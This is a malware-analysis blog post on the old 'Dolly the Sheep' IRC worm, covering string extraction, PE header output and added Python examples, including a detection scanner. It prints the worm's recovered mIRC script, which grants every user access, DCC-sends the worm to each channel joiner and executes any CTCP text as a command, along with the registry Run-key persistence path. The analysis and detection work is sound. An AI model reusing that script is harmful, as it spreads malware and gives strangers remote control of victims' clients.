RE: Dolly the Sheep worm
Dolly the Sheep is an IRC worm that uses the mIRC client to propagate. It appeared around 2000 (the link timestamp in the PE header, a value the linker writes and that can be forged, says 1999-09-30 10:28:08 UTC) and is identified as IRC-Worm.Win32.Dolly by the antivirus products that follow the CARO virus naming scheme.
My first contact with this worm was probably in 2002 or 2003. At that time IRC channels were the place where people met online to chat. Whenever you joined a channel, if one of the users was infected, you would see a pop-up asking you to accept a file sent by that victim.
Essentially, without any RE and based on my experience at the time, the worm, when executed, would:
- Copy itself to another location.
- Add itself to the programs executed when Windows starts.
- Check whether the victim has mIRC installed and, if so, create a mIRC script that sends a copy of the worm to other users without the victim noticing.
My plan here is to perform a static analysis of this malware to check how it did the things listed above and to see whether there is something hidden that I didn't notice at the time. For this task I'll use Kali Linux, although this is a Windows worm. The sample's SHA-256 is 43139dd432d35d0abb2bdbb9aeff39cab4510490f27e45f397a1cedb112ce38c.
Initial Analysis
$ file dolly_the_sheep
dolly_the_sheep: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
Yes, it is a Windows executable, no novelty so far. Next, let's check the strings inside the executable:
$ strings -a dolly_the_sheep
!This program cannot be run in DOS mode.
.text
`.data
.idata
@.rsrc
@.reloc
MSVBVM50.DLL
%pP@
%hP@
%|P@
%xP@
%lP@
%tP@
%dP@
020430Project1
0-C000-
Form1
Form1
VB5!
dolly_the_sheep
Project1
Project1
Form1
Module1
Form
C:\Program Files\Visual Basic 5.0\VB5.OLB
shell32
SHBrowseForFolder
SHGetPathFromIDList
kernel32
lstrcatA
GetPrivateProfileStringA
WritePrivateProfileStringA
FindFilesAPI
Form_Load
FindFirstFileA
FindNextFileA
GetFileAttributesA
FindClose
advapi32.dll
RegCloseKey
RegCreateKeyA
RegSetValueExA
VBA5.DLL
mp,
00&&/
path
SearchStr
FileCount
DirCount
yY+~yD
|yx#}y
MSVBVM50.DLL
MethCallEngine
EVENT_SINK_AddRef
DllFunctionCall
EVENT_SINK_Release
EVENT_SINK_QueryInterface
__vbaExceptHandler
ProcCallEngine
1u
0 0&0,02080>0D0J0P0U0
2 2(20282@2H2P2X2
5 5(54585P5X5`5h5p5x5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7r7w7
8$8,8X8\8
9(9,909p9t9|9
:!:L:P:X:]:h:m:
:l;p;x;};
<,<0<8<=<H<M<|<
6 6<6@6T6
7 7$7(7
Here we start to see some interesting things. The malware was written in Visual Basic 5 (VB5): the path C:\Program Files\Visual Basic 5.0\VB5.OLB is the VB5 type library, and MSVBVM50.DLL is the VB5 runtime. The runtime is also the only DLL in the import table; the kernel32, advapi32 and shell32 functions that appear below are reached through VB's Declare mechanism, which resolves them at run time via the runtime's DllFunctionCall, so they show up as plain strings (DLL name followed by function name) rather than as imports. Other lines (Form1, Project1 and Module1) show that the programmer didn't bother changing the default names.
Some other lines of interest are:
- SHBrowseForFolder and SHGetPathFromIDList are shell32 APIs for the folder-browse dialog and for converting the item list it returns into a path.
- lstrcatA concatenates strings, typically used for building paths and file names.
- GetPrivateProfileStringA and WritePrivateProfileStringA are Windows API functions for reading and writing .ini files. mIRC of that era kept its settings and remote scripts in .ini files (mirc.ini, remote.ini), so these are the likely means of installing the script from the third item of the list above.
- FindFilesAPI and Form_Load are VB procedure names. Form_Load is the event handler that runs when Form1 is loaded, the natural place for the worm's start-up logic; FindFilesAPI is presumably the programmer's own routine.
- FindFirstFileA, FindNextFileA, GetFileAttributesA and FindClose enumerate directories. Together with the variable names SearchStr, FileCount and DirCount they suggest a recursive search of the disk for a file, most likely the mIRC installation.
- RegCloseKey, RegCreateKeyA and RegSetValueExA manipulate registry keys. These were most likely used to add an entry to the Windows registry so that the malware runs at system start-up, which is the second item of the list at the beginning.
So far I didn't see the plain text of the script that the worm writes. My first thought was that the programmer had been smart enough to encode it, and the lines below look suspicious:
...
1u
0 0&0,02080>0D0J0P0U0
2 2(20282@2H2P2X2
5 5(54585P5X5`5h5p5x5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7r7w7
8$8,8X8\8
9(9,909p9t9|9
:!:L:P:X:]:h:m:
:l;p;x;};
<,<0<8<=<H<M<|<
6 6<6@6T6
7 7$7(7
They are not encoded strings, though. They are the base relocation table (the readpe output further down shows it at RVA 0x7000, 568 bytes, inside the .reloc section). Each relocation entry is a 16-bit word whose high nibble is the relocation type and whose low 12 bits are an offset within a 4 KiB page; a 32-bit image uses type 3 (IMAGE_REL_BASED_HIGHLOW), so the high byte of every entry is 0x30..0x3F, which is ASCII '0' to '?'. Read as text, a run of entries becomes a printable low byte alternating with a digit, exactly the pattern above, and each line is one page's block. The real reason the script text is missing is simpler: GNU strings scans for single-byte strings by default, while VB5 stores string literals as UTF-16LE, which strings only reports with -e l. To cover that, and to check whether anything else is hidden (stack strings, tight loops, decoding routines), I used the FLARE Obfuscated String Solver (FLOSS). FLOSS extracts ASCII and UTF-16LE static strings and uses heuristics and emulation to find and decode obfuscated ones. At the moment FLOSS is unfortunately not part of the Kali Linux toolset.
Then, let's give it another try using FLOSS:
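Both points (UTF-16LE literals that strings skips by default, and relocation entries that look like text) can be checked with a few lines of Python. The script below is an added example, not code from the original post: it runs on a buffer constructed inline rather than on the sample, and the fix-up offsets in that buffer were chosen so that the relocation block reads back as the tail of the first suspicious line. On the real file you would slice the relocation data out using the IMAGE_DIRECTORY_ENTRY_BASERELOC entry from the PE header (RVA 0x7000, 568 bytes for this sample) mapped through the section table to its file offset (the .reloc section's raw data starts at 0x3600).

```python
"""Added example, not code from the original post: why `strings` missed the
mIRC script and what the "0 0&0,0208..." lines really are.

1. VB5 keeps string literals as UTF-16LE; GNU strings scans single-byte
   strings by default (strings -e l finds the 16-bit ones).  extract_ascii()
   and extract_utf16le() reproduce both scans.
2. A PE base-relocation block is a header (page RVA, block size) followed by
   16-bit entries; the high nibble of each entry is the relocation type and a
   32-bit image uses type 3 (IMAGE_REL_BASED_HIGHLOW), so the high byte of
   every entry is 0x30..0x3F, ASCII '0'..'?'.  build_reloc_block() makes such
   a block and parse_reloc_blocks() decodes it.

The sample buffer is constructed here and is not taken from the worm.
"""
import re
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, skipped by the loader
IMAGE_REL_BASED_HIGHLOW = 3    # add the image-base delta to a 32-bit pointer


def extract_ascii(data, min_len=4):
    """What `strings` does by default: runs of printable single bytes."""
    pat = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    return [m.group().decode('ascii') for m in pat.finditer(data)]


def extract_utf16le(data, min_len=4):
    """What `strings -e l` does: runs of printable UTF-16LE code units."""
    pat = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    return [m.group().decode('utf-16-le') for m in pat.finditer(data)]


def build_reloc_block(page_rva, offsets):
    """One IMAGE_BASE_RELOCATION block with HIGHLOW fix-ups at the given page offsets."""
    entries = [(IMAGE_REL_BASED_HIGHLOW << 12) | (off & 0xFFF) for off in offsets]
    if len(entries) % 2:                      # blocks are DWORD-aligned
        entries.append(IMAGE_REL_BASED_ABSOLUTE << 12)
    size = 8 + 2 * len(entries)
    return struct.pack('<II', page_rva, size) + struct.pack('<%dH' % len(entries), *entries)


def parse_reloc_blocks(data):
    """Walk a base relocation directory; return [(page_rva, [(type, target_rva), ...])]."""
    blocks, pos = [], 0
    while pos + 8 <= len(data):
        page_rva, size = struct.unpack_from('<II', data, pos)
        if size < 8 or pos + size > len(data):
            break                             # truncated or corrupt block
        count = (size - 8) // 2
        words = struct.unpack_from('<%dH' % count, data, pos + 8)
        fixups = [(w >> 12, page_rva + (w & 0xFFF))
                  for w in words if (w >> 12) != IMAGE_REL_BASED_ABSOLUTE]
        blocks.append((page_rva, fixups))
        pos += size
    return blocks


def explain_reloc_as_text(offsets):
    """Why HIGHLOW entries print as '<char>0' pairs: high byte is 0x30 | (off >> 8)."""
    return ''.join(chr(off & 0xFF) + chr(0x30 | (off >> 8)) for off in offsets)


# Constructed sample: an ASCII API name as VB's Declare stores it, a UTF-16LE
# VB string literal, then a relocation block for the page at RVA 0x1000 whose
# offsets spell out the tail of the first "suspicious" line.
RELOC_OFFSETS = [0x20, 0x26, 0x2C, 0x32, 0x38, 0x3E, 0x44, 0x4A, 0x50, 0x55]
RELOC = build_reloc_block(0x1000, RELOC_OFFSETS)
SAMPLE = (b'\x00RegSetValueExA\x00\x00'
          + 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'.encode('utf-16-le')
          + b'\x00\x00'
          + RELOC)


if __name__ == '__main__':
    print('ascii   :', extract_ascii(SAMPLE))      # the API name and the reloc "string"
    print('utf16le :', extract_utf16le(SAMPLE))    # the VB literal strings never showed
    for page, fixups in parse_reloc_blocks(RELOC):
        print(f'reloc page 0x{page:04x}:', [f'type {t} @ 0x{rva:04x}' for t, rva in fixups])
```

The ASCII scan returns the relocation block as the string " 0&0,02080>0D0J0P0U0" while the UTF-16LE scan is the only one that sees the registry path; parsing the same bytes as relocation entries gives ten type-3 fix-ups at RVAs 0x1020..0x1055.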
$ ./floss dolly_the_sheep
FLARE FLOSS RESULTS (version v3.1.0-0-gdb9af41)
+------------------------+------------------------------------------------------------------------------------+
| file path | dolly_the_sheep |
| identified language | unknown |
| extracted strings | |
| static strings | 123 (1858 characters) |
| language strings | 0 ( 0 characters) |
| stack strings | 0 |
| tight strings | 0 |
| decoded strings | 0 |
+------------------------+------------------------------------------------------------------------------------+
────────────────────────────
FLOSS STATIC STRINGS (123)
────────────────────────────
+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (73) |
+----------------------------------+
NOTE: This section was omitted since the content here is similar to the strings output.
+-------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (50) |
+-------------------------------------+
*\AD:\MIRCSC~1\PROJECT1.VBP
Mirc
nick
.ini
anick
uservar.ini
[script]
n1=#remotecontrol on
n2=on 1:connect:auser 125 *!*@*
n3=on 1:join:if ($nick != $me) { /dcc send $nick
.exe" }
n4=ctcp 125:*:?:$1-
n5=#remotecontrol end
rfiles
remote.ini
user.ini
var.ini
addon\pedo.mrc
options
1,1,0,1,1,0,300,1,1,0,1,0,1,0,1,1,0,0,1,0,512,0,1,3,0,0,1,0
5,50,0,0,0,0,0,1,2,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,20,0,1,0,0
1,0,0,0,1,1,1,1,0,20,60,1,1,1,1,0,0,1,0,60,80,2,0,0,1,0,1
500,1,0,1,1,0,1,1,1,1,1,1,0,0,0,0,3,1,1,1,0,0,0,0,1,1,1,25,0
1,0,1,1,0,0,999,1,0,0,0,1,1024,1,1,9999,10,0,0,1,1,1,0,1,1,5000
1,1,1,1,1,1,1,1,1,1,6667,1215752191,0,1,0,0,1,0,300,10,4,0,1,22,0,0,1
1,1,9,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,0,0,0,100,1,1,1,1
Software\Microsoft\Windows\CurrentVersion\Run
System
.exe
mirc.ini
n3=on 1:join:#:if ($nick != $me) /dcc send $nick
.exe"
.exe "
.exe ;"
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
CompanyName
Kaos Industries
ProductName
FileVersion
1.00
ProductVersion
1.00
InternalName
dolly_the_sheep
OriginalFilename
dolly_the_sheep.exe
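The UTF-16LE strings FLOSS recovered are the mIRC script the worm installs, in pieces. Read in order, n1..n5 form a remote script group: n2 runs on connect and grants user level 125 to every address mask (*!*@*); n3 runs whenever someone joins a channel and DCC-sends the worm executable to that user (the executable name is concatenated at run time and is not visible in the dump, only the trailing .exe fragments); n4 is a ctcp handler for level-125 users that executes the text of any private CTCP as a mIRC command ($1-), which is a remote-control backdoor open to everyone; and the [rfiles] fragment is the section of mirc.ini that lists which script files mIRC loads, with addon\pedo.mrc a file name the worm apparently writes there. Together with the Software\Microsoft\Windows\CurrentVersion\Run string and the registry APIs seen earlier this covers all three items from the start of the post. The script below turns that into a small check for a mIRC installation; it is an added example, not code from the original post, and the mirc.ini and script contents it scans are constructed for the example (the worm's executable path is a placeholder).

```python
"""Added example, not code from the original post: scan a mIRC install for
the behaviours found in Dolly the Sheep's script fragments.

Recovered script (n3 reconstructed from its two halves, executable elided):
    n1=#remotecontrol on
    n2=on 1:connect:auser 125 *!*@*
    n3=on 1:join:#:if ($nick != $me) /dcc send $nick <worm>.exe
    n4=ctcp 125:*:?:$1-
    n5=#remotecontrol end

Checks: which script files mirc.ini loads ([rfiles]), join handlers that
DCC-send a file to every joiner, and ctcp handlers that run the CTCP text
($1-) as a command for a user level that was handed out to *!*@*.
All sample files below are constructed; the worm path is a placeholder.
"""
import re
from collections import defaultdict

SCRIPT_KEY_RE = re.compile(r'^n\d+$')                       # mIRC stores lines as nN=...
# "auser <level> *!*@*": every address mask gets <level>.
WILDCARD_AUSER_RE = re.compile(r'\bauser\s+(\d+)\s+\*!\*@\*', re.I)
# "on <level>:join:... /dcc send $nick <file>": push a file to each joiner.
JOIN_DCC_SEND_RE = re.compile(r'^on\s+\S+:join:.*\bdcc\s+send\s+\$nick\b', re.I)
# "ctcp <level>:<match>:<location>:$1-": execute the CTCP text as a command.
CTCP_EXEC_RE = re.compile(r'^ctcp\s+(\d+):[^:]*:[^:]*:\s*\$1-\s*$', re.I)


def parse_ini(text):
    """Tolerant .ini parser: {section: [(key, value), ...]}, order and duplicates kept."""
    sections, current = defaultdict(list), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].lower()
        elif current is not None and '=' in line:
            key, value = line.split('=', 1)
            sections[current].append((key.strip(), value.strip()))
    return dict(sections)


def loaded_script_files(mirc_ini_text):
    """Script files mIRC loads at start-up: the values of mirc.ini's [rfiles] section."""
    return [value for _, value in parse_ini(mirc_ini_text).get('rfiles', [])]


def scan_remote_script(script_text):
    """Return (finding, script_line) pairs for the three behaviours of the worm's script."""
    lines = [value for entries in parse_ini(script_text).values()
             for key, value in entries if SCRIPT_KEY_RE.match(key)]
    # First pass: which user levels are granted to everyone.
    wildcard_levels = {int(m.group(1)) for line in lines
                       for m in [WILDCARD_AUSER_RE.search(line)] if m}
    findings = []
    for line in lines:
        if WILDCARD_AUSER_RE.search(line):
            findings.append(('wildcard_auser', line))
        elif JOIN_DCC_SEND_RE.match(line):
            findings.append(('join_dcc_send', line))
        else:
            m = CTCP_EXEC_RE.match(line)
            if m:
                kind = 'ctcp_exec_backdoor' if int(m.group(1)) in wildcard_levels else 'ctcp_exec'
                findings.append((kind, line))
    return findings


def audit(mirc_ini_text, script_files):
    """Scan every script mirc.ini loads; script_files maps file name -> contents."""
    return {name: scan_remote_script(script_files.get(name, ''))
            for name in loaded_script_files(mirc_ini_text)
            if scan_remote_script(script_files.get(name, ''))}


# Constructed sample files (not real victim data).
WORM_REMOTE_INI = r"""
[script]
n1=#remotecontrol on
n2=on 1:connect:auser 125 *!*@*
n3=on 1:join:#:if ($nick != $me) /dcc send $nick C:\placeholder\worm.exe
n4=ctcp 125:*:?:$1-
n5=#remotecontrol end
"""
BENIGN_REMOTE_INI = r"""
[script]
n0=on 1:join:#:if ($nick != $me) /msg $nick Welcome to $chan
n1=ctcp 1:VERSION:*:/ctcpreply $nick VERSION mIRC
"""
MIRC_INI = r"""
[mirc]
nick=sheep
anick=sheep_
[rfiles]
n0=remote.ini
n1=addon\pedo.mrc
"""

if __name__ == '__main__':
    files = {'remote.ini': WORM_REMOTE_INI, 'addon\\pedo.mrc': BENIGN_REMOTE_INI}
    for name, findings in audit(MIRC_INI, files).items():
        print(name)
        for kind, line in findings:
            print(f'  {kind:20s} {line}')
```

The ctcp check is deliberately tied to the first pass: a `ctcp N:*:?:$1-` handler is only reported as a backdoor when level N was handed out with `auser N *!*@*`, which is what makes the worm's n2/n4 pair exploitable by any IRC user rather than by a configured friend list.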
$ readpe dolly_the_sheep
DOS Header
Magic number: 0x5a4d (MZ)
Bytes in last page: 144
Pages in file: 3
Relocations: 0
Size of header in paragraphs: 4
Minimum extra paragraphs: 0
Maximum extra paragraphs: 65535
Initial (relative) SS value: 0
Initial SP value: 0xb8
Initial IP value: 0
Initial (relative) CS value: 0
Address of relocation table: 0x40
Overlay number: 0
OEM identifier: 0
OEM information: 0
PE header offset: 0x80
PE header
Signature: 0x00004550 (PE)
COFF/File header
Machine: 0x14c IMAGE_FILE_MACHINE_I386
Number of sections: 5
Date/time stamp: 938687288 (Thu, 30 Sep 1999 10:28:08 UTC)
Symbol Table offset: 0
Number of symbols: 0
Size of optional header: 0xe0
Characteristics: 0x10e
Characteristics names
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LINE_NUMS_STRIPPED
IMAGE_FILE_LOCAL_SYMS_STRIPPED
IMAGE_FILE_32BIT_MACHINE
Optional/Image header
Magic number: 0x10b (PE32)
Linker major version: 4
Linker minor version: 20
Size of .text section: 0x2600
Size of .data section: 0x1c00
Size of .bss section: 0
Entrypoint: 0x1054
Address of .text section: 0x1000
Address of .data section: 0x4000
ImageBase: 0x400000
Alignment of sections: 0x1000
Alignment factor: 0x200
Major version of required OS: 4
Minor version of required OS: 0
Major version of image: 1
Minor version of image: 0
Major version of subsystem: 4
Minor version of subsystem: 0
Win32 version value: 0
Overwrite OS major version: (default)
Overwrite OS minor version: (default)
Overwrite OS build number: (default)
Overwrite OS platform id: (default)
Size of image: 0x8000
Size of headers: 0x400
Checksum: 0x4a82
Subsystem required: 0x2 (IMAGE_SUBSYSTEM_WINDOWS_GUI)
DLL characteristics: 0
DLL characteristics names
Size of stack to reserve: 0x100000
Size of stack to commit: 0x1000
Size of heap space to reserve: 0x100000
Size of heap space to commit: 0x1000
Loader Flags: 0
Loader Flags names
Data directories
Directory
IMAGE_DIRECTORY_ENTRY_IMPORT: 0x5000 (40 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_RESOURCE: 0x6000 (2284 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_BASERELOC: 0x7000 (568 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT: 0x240 (32 bytes)
Directory
IMAGE_DIRECTORY_ENTRY_IAT: 0x5064 (60 bytes)
Imported functions
Library
Name: MSVBVM50.DLL
Functions
Function
Hint: 0
Name: MethCallEngine
Function
Ordinal: 525
Function
Hint: 0
Name: EVENT_SINK_AddRef
Function
Hint: 0
Name: DllFunctionCall
Function
Hint: 0
Name: EVENT_SINK_Release
Function
Hint: 0
Name: EVENT_SINK_QueryInterface
Function
Hint: 0
Name: __vbaExceptHandler
Function
Ordinal: 608
Function
Hint: 0
Name: ProcCallEngine
Function
Ordinal: 100
Function
Ordinal: 616
Function
Ordinal: 617
Function
Ordinal: 618
Function
Ordinal: 619
Exported functions
Sections
Section
Name: .text
Virtual Size: 0x2594 (9620 bytes)
Virtual Address: 0x1000
Size Of Raw Data: 0x2600 (9728 bytes)
Pointer To Raw Data: 0x400
Number Of Relocations: 0
Characteristics: 0x60000020
Characteristic Names
IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READ
Section
Name: .data
Virtual Size: 0xad4 (2772 bytes)
Virtual Address: 0x4000
Size Of Raw Data: 0 (0 bytes)
Pointer To Raw Data: 0
Number Of Relocations: 0
Characteristics: 0xc0000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
IMAGE_SCN_MEM_WRITE
Section
Name: .idata
Virtual Size: 0x140 (320 bytes)
Virtual Address: 0x5000
Size Of Raw Data: 0x200 (512 bytes)
Pointer To Raw Data: 0x2a00
Number Of Relocations: 0
Characteristics: 0x40000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
Section
Name: .rsrc
Virtual Size: 0x8ec (2284 bytes)
Virtual Address: 0x6000
Size Of Raw Data: 0xa00 (2560 bytes)
Pointer To Raw Data: 0x2c00
Number Of Relocations: 0
Characteristics: 0x40000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
Section
Name: .reloc
Virtual Size: 0x25a (602 bytes)
Virtual Address: 0x7000
Size Of Raw Data: 0x400 (1024 bytes)
Pointer To Raw Data: 0x3600
Number Of Relocations: 0
Characteristics: 0x42000040
Characteristic Names
IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_DISCARDABLE
IMAGE_SCN_MEM_READ